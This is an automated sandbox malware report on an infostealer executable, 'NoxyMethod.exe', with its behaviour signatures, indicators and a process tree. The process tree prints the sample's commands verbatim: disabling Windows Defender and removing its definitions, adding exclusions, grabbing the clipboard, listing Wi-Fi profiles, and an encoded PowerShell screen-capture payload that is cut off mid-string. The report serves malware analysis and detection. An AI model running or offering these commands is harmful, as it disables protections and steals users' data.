16eb6650d5f20ffa6712d6f4cfb4bab1ce13dbc7cd642af16b9acdbec7724d68

Analysis

max time kernel
15s
max time network
19s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
12/01/2025, 02:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NoxyMethod.exe
Size

6.9MB
MD5

5aef9ba6cefdf510fbc8f581933a61d1
SHA1

baefcc3096c90ce7ee302fd8f626b97a742d874d
SHA256

16eb6650d5f20ffa6712d6f4cfb4bab1ce13dbc7cd642af16b9acdbec7724d68
SHA512

d5e6741efc1d90dfcc2541d5b13ba063213820c2f594e331d766df373ad7bfe4c8ad2a58a070f1969307a4b23197bea705d96db8b74a72252f8d40a827d86096
SSDEEP

196608:rvV1vGZwQB6ylnlPzf+JiJCsmFMvQn6hqgdhc:fKZBRlnlPSa7mmvQpgdhc

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3488	powershell.exe
1104	powershell.exe
2252	powershell.exe
4528	powershell.exe
2252	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1548	cmd.exe
108	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2144	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2064	NoxyMethod.exe
2064	NoxyMethod.exe
2064	NoxyMethod.exe
2064	NoxyMethod.exe
2064	NoxyMethod.exe
2064	NoxyMethod.exe
2064	NoxyMethod.exe
2064	NoxyMethod.exe
2064	NoxyMethod.exe
2064	NoxyMethod.exe
2064	NoxyMethod.exe
2064	NoxyMethod.exe
2064	NoxyMethod.exe
2064	NoxyMethod.exe
2064	NoxyMethod.exe
2064	NoxyMethod.exe
2064	NoxyMethod.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	discord.com
5	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
4436	tasklist.exe
1932	tasklist.exe
4908	tasklist.exe
2196	tasklist.exe

UPX packed file 61 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002aad0-21.dat	upx
behavioral1/memory/2064-25-0x00007FFE99B00000-0x00007FFE9A0EA000-memory.dmp	upx
behavioral1/files/0x001c00000002aab7-27.dat	upx
behavioral1/memory/2064-29-0x00007FFEA3770000-0x00007FFEA3793000-memory.dmp	upx
behavioral1/files/0x001900000002aace-30.dat	upx
behavioral1/memory/2064-32-0x00007FFEA3810000-0x00007FFEA381F000-memory.dmp	upx
behavioral1/files/0x001900000002aacb-34.dat	upx
behavioral1/files/0x001900000002aad6-39.dat	upx
behavioral1/files/0x001a00000002aab8-42.dat	upx
behavioral1/files/0x001900000002aac7-48.dat	upx
behavioral1/files/0x001900000002aac6-47.dat	upx
behavioral1/files/0x001900000002aac5-46.dat	upx
behavioral1/files/0x001900000002aac4-45.dat	upx
behavioral1/files/0x001b00000002aabe-43.dat	upx
behavioral1/files/0x004900000002aa99-41.dat	upx
behavioral1/files/0x001900000002aad7-40.dat	upx
behavioral1/files/0x001c00000002aad5-38.dat	upx
behavioral1/files/0x001c00000002aacf-35.dat	upx
behavioral1/files/0x001900000002aac3-44.dat	upx
behavioral1/memory/2064-54-0x00007FFE9CE60000-0x00007FFE9CE8D000-memory.dmp	upx
behavioral1/memory/2064-56-0x00007FFE9F580000-0x00007FFE9F599000-memory.dmp	upx
behavioral1/memory/2064-58-0x00007FFE9CE30000-0x00007FFE9CE53000-memory.dmp	upx
behavioral1/memory/2064-60-0x00007FFE99990000-0x00007FFE99AFF000-memory.dmp	upx
behavioral1/memory/2064-63-0x00007FFE9F4A0000-0x00007FFE9F4B9000-memory.dmp	upx
behavioral1/memory/2064-64-0x00007FFEA37D0000-0x00007FFEA37DD000-memory.dmp	upx
behavioral1/memory/2064-66-0x00007FFE9CE00000-0x00007FFE9CE2E000-memory.dmp	upx
behavioral1/memory/2064-70-0x00007FFE99B00000-0x00007FFE9A0EA000-memory.dmp	upx
behavioral1/memory/2064-74-0x00007FFEA3770000-0x00007FFEA3793000-memory.dmp	upx
behavioral1/memory/2064-73-0x00007FFE99550000-0x00007FFE998C5000-memory.dmp	upx
behavioral1/memory/2064-71-0x00007FFE998D0000-0x00007FFE99988000-memory.dmp	upx
behavioral1/memory/2064-79-0x00007FFE9CDF0000-0x00007FFE9CDFD000-memory.dmp	upx
behavioral1/memory/2064-81-0x00007FFE9F580000-0x00007FFE9F599000-memory.dmp	upx
behavioral1/memory/2064-82-0x00007FFE99270000-0x00007FFE9938C000-memory.dmp	upx
behavioral1/memory/2064-78-0x00007FFE9CE60000-0x00007FFE9CE8D000-memory.dmp	upx
behavioral1/memory/2064-76-0x00007FFE9E270000-0x00007FFE9E284000-memory.dmp	upx
behavioral1/memory/2064-106-0x00007FFE9CE30000-0x00007FFE9CE53000-memory.dmp	upx
behavioral1/memory/2064-119-0x00007FFE9F4A0000-0x00007FFE9F4B9000-memory.dmp	upx
behavioral1/memory/2064-118-0x00007FFE99990000-0x00007FFE99AFF000-memory.dmp	upx
behavioral1/memory/2064-240-0x00007FFEA37D0000-0x00007FFEA37DD000-memory.dmp	upx
behavioral1/memory/2064-251-0x00007FFE9CE00000-0x00007FFE9CE2E000-memory.dmp	upx
behavioral1/memory/2064-263-0x00007FFE998D0000-0x00007FFE99988000-memory.dmp	upx
behavioral1/memory/2064-271-0x00007FFE99550000-0x00007FFE998C5000-memory.dmp	upx
behavioral1/memory/2064-290-0x00007FFE99B00000-0x00007FFE9A0EA000-memory.dmp	upx
behavioral1/memory/2064-304-0x00007FFE99270000-0x00007FFE9938C000-memory.dmp	upx
behavioral1/memory/2064-296-0x00007FFE99990000-0x00007FFE99AFF000-memory.dmp	upx
behavioral1/memory/2064-291-0x00007FFEA3770000-0x00007FFEA3793000-memory.dmp	upx
behavioral1/memory/2064-305-0x00007FFE99B00000-0x00007FFE9A0EA000-memory.dmp	upx
behavioral1/memory/2064-319-0x00007FFE99270000-0x00007FFE9938C000-memory.dmp	upx
behavioral1/memory/2064-330-0x00007FFE998D0000-0x00007FFE99988000-memory.dmp	upx
behavioral1/memory/2064-329-0x00007FFE9CE00000-0x00007FFE9CE2E000-memory.dmp	upx
behavioral1/memory/2064-328-0x00007FFE9F4A0000-0x00007FFE9F4B9000-memory.dmp	upx
behavioral1/memory/2064-327-0x00007FFEA37D0000-0x00007FFEA37DD000-memory.dmp	upx
behavioral1/memory/2064-326-0x00007FFE99990000-0x00007FFE99AFF000-memory.dmp	upx
behavioral1/memory/2064-325-0x00007FFE9CE30000-0x00007FFE9CE53000-memory.dmp	upx
behavioral1/memory/2064-324-0x00007FFE9F580000-0x00007FFE9F599000-memory.dmp	upx
behavioral1/memory/2064-323-0x00007FFE9CE60000-0x00007FFE9CE8D000-memory.dmp	upx
behavioral1/memory/2064-322-0x00007FFEA3810000-0x00007FFEA381F000-memory.dmp	upx
behavioral1/memory/2064-321-0x00007FFEA3770000-0x00007FFEA3793000-memory.dmp	upx
behavioral1/memory/2064-320-0x00007FFE99550000-0x00007FFE998C5000-memory.dmp	upx
behavioral1/memory/2064-318-0x00007FFE9CDF0000-0x00007FFE9CDFD000-memory.dmp	upx
behavioral1/memory/2064-317-0x00007FFE9E270000-0x00007FFE9E284000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4300	cmd.exe
4892	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5092	WMIC.exe
4420	WMIC.exe
3552	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4004	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
3488	powershell.exe
3488	powershell.exe
2252	powershell.exe
2252	powershell.exe
1104	powershell.exe
1104	powershell.exe
108	powershell.exe
108	powershell.exe
108	powershell.exe
1992	powershell.exe
1992	powershell.exe
1992	powershell.exe
4528	powershell.exe
4528	powershell.exe
2828	powershell.exe
2828	powershell.exe
2252	powershell.exe
2252	powershell.exe
2260	powershell.exe
2260	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4436	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1952	WMIC.exe
Token: SeSecurityPrivilege	1952	WMIC.exe
Token: SeTakeOwnershipPrivilege	1952	WMIC.exe
Token: SeLoadDriverPrivilege	1952	WMIC.exe
Token: SeSystemProfilePrivilege	1952	WMIC.exe
Token: SeSystemtimePrivilege	1952	WMIC.exe
Token: SeProfSingleProcessPrivilege	1952	WMIC.exe
Token: SeIncBasePriorityPrivilege	1952	WMIC.exe
Token: SeCreatePagefilePrivilege	1952	WMIC.exe
Token: SeBackupPrivilege	1952	WMIC.exe
Token: SeRestorePrivilege	1952	WMIC.exe
Token: SeShutdownPrivilege	1952	WMIC.exe
Token: SeDebugPrivilege	1952	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1952	WMIC.exe
Token: SeRemoteShutdownPrivilege	1952	WMIC.exe
Token: SeUndockPrivilege	1952	WMIC.exe
Token: SeManageVolumePrivilege	1952	WMIC.exe
Token: 33	1952	WMIC.exe
Token: 34	1952	WMIC.exe
Token: 35	1952	WMIC.exe
Token: 36	1952	WMIC.exe
Token: SeDebugPrivilege	3488	powershell.exe
Token: SeDebugPrivilege	2252	powershell.exe
Token: SeIncreaseQuotaPrivilege	1952	WMIC.exe
Token: SeSecurityPrivilege	1952	WMIC.exe
Token: SeTakeOwnershipPrivilege	1952	WMIC.exe
Token: SeLoadDriverPrivilege	1952	WMIC.exe
Token: SeSystemProfilePrivilege	1952	WMIC.exe
Token: SeSystemtimePrivilege	1952	WMIC.exe
Token: SeProfSingleProcessPrivilege	1952	WMIC.exe
Token: SeIncBasePriorityPrivilege	1952	WMIC.exe
Token: SeCreatePagefilePrivilege	1952	WMIC.exe
Token: SeBackupPrivilege	1952	WMIC.exe
Token: SeRestorePrivilege	1952	WMIC.exe
Token: SeShutdownPrivilege	1952	WMIC.exe
Token: SeDebugPrivilege	1952	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1952	WMIC.exe
Token: SeRemoteShutdownPrivilege	1952	WMIC.exe
Token: SeUndockPrivilege	1952	WMIC.exe
Token: SeManageVolumePrivilege	1952	WMIC.exe
Token: 33	1952	WMIC.exe
Token: 34	1952	WMIC.exe
Token: 35	1952	WMIC.exe
Token: 36	1952	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5092	WMIC.exe
Token: SeSecurityPrivilege	5092	WMIC.exe
Token: SeTakeOwnershipPrivilege	5092	WMIC.exe
Token: SeLoadDriverPrivilege	5092	WMIC.exe
Token: SeSystemProfilePrivilege	5092	WMIC.exe
Token: SeSystemtimePrivilege	5092	WMIC.exe
Token: SeProfSingleProcessPrivilege	5092	WMIC.exe
Token: SeIncBasePriorityPrivilege	5092	WMIC.exe
Token: SeCreatePagefilePrivilege	5092	WMIC.exe
Token: SeBackupPrivilege	5092	WMIC.exe
Token: SeRestorePrivilege	5092	WMIC.exe
Token: SeShutdownPrivilege	5092	WMIC.exe
Token: SeDebugPrivilege	5092	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5092	WMIC.exe
Token: SeRemoteShutdownPrivilege	5092	WMIC.exe
Token: SeUndockPrivilege	5092	WMIC.exe
Token: SeManageVolumePrivilege	5092	WMIC.exe
Token: 33	5092	WMIC.exe
Token: 34	5092	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4016 wrote to memory of 2064	4016	NoxyMethod.exe	77
PID 4016 wrote to memory of 2064	4016	NoxyMethod.exe	77
PID 2064 wrote to memory of 3608	2064	NoxyMethod.exe	78
PID 2064 wrote to memory of 3608	2064	NoxyMethod.exe	78
PID 2064 wrote to memory of 3024	2064	NoxyMethod.exe	79
PID 2064 wrote to memory of 3024	2064	NoxyMethod.exe	79
PID 2064 wrote to memory of 3040	2064	NoxyMethod.exe	80
PID 2064 wrote to memory of 3040	2064	NoxyMethod.exe	80
PID 2064 wrote to memory of 2916	2064	NoxyMethod.exe	84
PID 2064 wrote to memory of 2916	2064	NoxyMethod.exe	84
PID 2064 wrote to memory of 4820	2064	NoxyMethod.exe	86
PID 2064 wrote to memory of 4820	2064	NoxyMethod.exe	86
PID 2916 wrote to memory of 4436	2916	cmd.exe	88
PID 2916 wrote to memory of 4436	2916	cmd.exe	88
PID 3608 wrote to memory of 3488	3608	cmd.exe	89
PID 3608 wrote to memory of 3488	3608	cmd.exe	89
PID 4820 wrote to memory of 1952	4820	cmd.exe	90
PID 4820 wrote to memory of 1952	4820	cmd.exe	90
PID 3040 wrote to memory of 1328	3040	cmd.exe	91
PID 3040 wrote to memory of 1328	3040	cmd.exe	91
PID 3024 wrote to memory of 2252	3024	cmd.exe	92
PID 3024 wrote to memory of 2252	3024	cmd.exe	92
PID 2064 wrote to memory of 2108	2064	NoxyMethod.exe	94
PID 2064 wrote to memory of 2108	2064	NoxyMethod.exe	94
PID 2108 wrote to memory of 4656	2108	cmd.exe	96
PID 2108 wrote to memory of 4656	2108	cmd.exe	96
PID 2064 wrote to memory of 3704	2064	NoxyMethod.exe	97
PID 2064 wrote to memory of 3704	2064	NoxyMethod.exe	97
PID 3704 wrote to memory of 1580	3704	cmd.exe	99
PID 3704 wrote to memory of 1580	3704	cmd.exe	99
PID 2064 wrote to memory of 4980	2064	NoxyMethod.exe	100
PID 2064 wrote to memory of 4980	2064	NoxyMethod.exe	100
PID 4980 wrote to memory of 5092	4980	cmd.exe	102
PID 4980 wrote to memory of 5092	4980	cmd.exe	102
PID 2064 wrote to memory of 1480	2064	NoxyMethod.exe	103
PID 2064 wrote to memory of 1480	2064	NoxyMethod.exe	103
PID 1480 wrote to memory of 4420	1480	cmd.exe	105
PID 1480 wrote to memory of 4420	1480	cmd.exe	105
PID 2064 wrote to memory of 4384	2064	NoxyMethod.exe	106
PID 2064 wrote to memory of 4384	2064	NoxyMethod.exe	106
PID 4384 wrote to memory of 1104	4384	cmd.exe	108
PID 4384 wrote to memory of 1104	4384	cmd.exe	108
PID 2064 wrote to memory of 4428	2064	NoxyMethod.exe	109
PID 2064 wrote to memory of 4428	2064	NoxyMethod.exe	109
PID 2064 wrote to memory of 3880	2064	NoxyMethod.exe	110
PID 2064 wrote to memory of 3880	2064	NoxyMethod.exe	110
PID 2064 wrote to memory of 1408	2064	NoxyMethod.exe	113
PID 2064 wrote to memory of 1408	2064	NoxyMethod.exe	113
PID 4428 wrote to memory of 1932	4428	cmd.exe	115
PID 4428 wrote to memory of 1932	4428	cmd.exe	115
PID 3880 wrote to memory of 4908	3880	cmd.exe	116
PID 3880 wrote to memory of 4908	3880	cmd.exe	116
PID 2064 wrote to memory of 1548	2064	NoxyMethod.exe	161
PID 2064 wrote to memory of 1548	2064	NoxyMethod.exe	161
PID 2064 wrote to memory of 2768	2064	NoxyMethod.exe	118
PID 2064 wrote to memory of 2768	2064	NoxyMethod.exe	118
PID 2064 wrote to memory of 4296	2064	NoxyMethod.exe	119
PID 2064 wrote to memory of 4296	2064	NoxyMethod.exe	119
PID 1408 wrote to memory of 2304	1408	cmd.exe	123
PID 1408 wrote to memory of 2304	1408	cmd.exe	123
PID 2064 wrote to memory of 4300	2064	NoxyMethod.exe	124
PID 2064 wrote to memory of 4300	2064	NoxyMethod.exe	124
PID 2064 wrote to memory of 732	2064	NoxyMethod.exe	125
PID 2064 wrote to memory of 732	2064	NoxyMethod.exe	125

C:\Users\Admin\AppData\Local\Temp\NoxyMethod.exe
"C:\Users\Admin\AppData\Local\Temp\NoxyMethod.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4016
- C:\Users\Admin\AppData\Local\Temp\NoxyMethod.exe
  "C:\Users\Admin\AppData\Local\Temp\NoxyMethod.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NoxyMethod.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3608
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NoxyMethod.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3024
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Press OK to Inject!', 0, 'Noxy Method', 48+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3040
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Press OK to Inject!', 0, 'Noxy Method', 48+16);close()"
      4⤵
      PID:1328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2916
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4820
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2108
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3704
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4980
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:5092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1480
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ ‎‍.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4384
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ ‎‍.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4428
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3880
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1408
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:2304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:1548
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2768
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4296
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4300
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:732
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYw